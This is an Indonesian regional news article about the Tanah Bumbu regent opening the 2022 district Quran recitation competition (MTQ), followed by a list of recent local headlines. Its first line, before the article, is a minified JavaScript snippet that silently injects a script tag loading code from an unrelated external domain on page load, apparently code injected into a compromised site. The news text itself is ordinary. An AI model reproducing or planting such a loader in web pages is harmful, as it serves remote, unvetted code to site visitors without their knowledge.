(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

Bupati Zairullah Membuka MTQ Nasional XVIII 2022 Tingkat Kabupaten Tanbu


KANALKALIMANTAN.COM, BATULICIN – Bupati Tanah Bumbu (Tanbu) HM Zairullah Azhar resmi membuka Musabaqah Tilawatil Quran (MTQ) Nasional ke-XVIII tahun 2022 Tingkat Kabupaten Tanbu.

Acara digelar di Kecamatan Angsana, Jumat (2/9/2022) malam, dibuka Bupati Tanah Bumbu HM Zairullah Azhar, dilaksanakan selama 2-8 September 2022.

Diawali dengan pawai kafilah dari setiap kecamatan, penampilan Tari Kolosal Angsana dari SBA Angsana dan lantunan Ayat Suci Al Qur’an oleh qori internasional Darwin Hasibuan, juara 1 MTQ Internasional DMDI di Melaka Malaysia 2012.

Ketua Panitia MTQ Ke-XVIII Tingkat Kabupaten Tanah Bumbu, Liana Hamita mengatakan, kegiatan ini adalah untuk menumbuhkan potensi minat dan bakat generasi muda senantiasa membumikan Al Qur’an, sehingga nantinya dapat menghasilkan generasi qori dan hafidz terbaik.

 

 

Baca juga: 3 September, Sejarah Berdirinya PMI

Mengusung tema “Baca Al Qur’an Hayati dan Amalkan Kandungannya Untuk Akselerasi Pembangunan Bumi Bersujud Mewujudkan Tanah Bumbu Menuju Serambi Madinah”.

Sebanyak 28 cabang lomba beserta festival rebana diadakan, dengan diikuti sebanyak 626 peserta yang terdiri dari 12 kafilah dari setiap kecamatan di Kabupaten Tanah Bumbu.

Sementara itu Kepala Kantor Kementerian Agama Tanbu, Drs HM Rudi Hilmi mengatakan, ayat suci Al Qur’an merupakan Kalam Allah yang diturunkan untuk menjadi tuntunan dan pegangan bagi umat manusia agar memperoleh kebahagiaan di dunia maupun di akhirat.

Membaca Al Qur’an merupakan bagian dari ibadah umat Muslim kepada Allah SWT. terlebih apabila ditambah dengan mempelajari, mendalami, mengamalkan dan mengambil hikmah yang terkandung didalamnya, yang berisi nilai-nilai keimanan ilmu pengetahuan kisah sejarah falsafah hidup kemuliaan dan keteladanan serta pesan-pesan moral yang agung.

Bupati Tanah Bumbu HM Zairullah Azhar saat membuka MTQ mengaku bangga dan terharu menyaksikan betapa meriahnya gelaran MTQ ke XVIII kali ini.

Bupati menyebutkan, apa yang telah terjadi di masa ini merupakan sebuah perubahan yang luar biasa, mengingat Kabupaten Tanah Bumbu yang terus tumbuh dengan berbagai proses dinamika yang menyertai.

Baca juga: Siapa Tersangka Kasus Tewasnya Sarijan, Kapolda Kalsel Belum Buka ke Publik

Melalui momentum MTQ tersebut Zairullah kemudian berpesan kepada Kepala SKPD, Camat, Kepala Desa serta unsur Pemerintah lainnya, untuk dapat bersungguh-sungguh untuk bagaimana memberikan warisan amal jariyah bagi masyarakat, disamping pembangunan fisik.

“Hari ini kita berkomitmen bahwa salah satu yang ingin kita capai adalah mewariskan generasi tangguh masa depan yang bukan hanya cerdas dalam keilmuan, tetapi juga cerdas dalam agama dan mudah-mudahan bisa menjadi penghafal-penghafal Al Qur’an,” ucapnya. (Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : kk


Risa

Recent Posts

Raperda Inisiatif Sistem Drainase Tawaran Solusi Banjir dan Genangan Air di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Persoalan banjir dan genangan air masih menjadi pekerjaan rumah (PR) yang hingga… Read More

1 jam ago

Upaya Meningkatkan Akreditasi Perpustakaan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Kearsipan dan Perpustakaan Daerah (Darpusda) Kota Banjarbaru menggelar sosialisasi pembinaan perpustakaan… Read More

2 jam ago

Cabang Musabaqah Syarhil Qur’an Kafilah HSU Putra Putri Lolos ke Final

KANALKALIMANTAN.COM, RANTAU - Hari ketiga Musabaqah Tilawatil Quran (MTQ) Nasional XXXV tingkat Provinsi Kalimantan Selatan… Read More

3 jam ago

65 Peserta Calon Guru Penggerak di Kabupaten Banjar Ikuti Lokakarya

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur mengingatkan para tenaga pengajar bahwa yantangan di… Read More

3 jam ago

Bupati Banjar Buka Temu Teknis Penyuluh Pertanian se Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur membuka Temu Teknis Penyuluh Pertanian se Kabupaten… Read More

3 jam ago

DPRD Banjarbaru Target Tiga Raperda Inisiatif Selesai Dalam Tiga Bulan

KANALKALIMANTAN.COM, BANJARBARU - Tiga buah Rancangan Peraturan Daerah (Raperda) inisiatif ditargetkan selesai dalam waktu tiga… Read More

5 jam ago

This website uses cookies.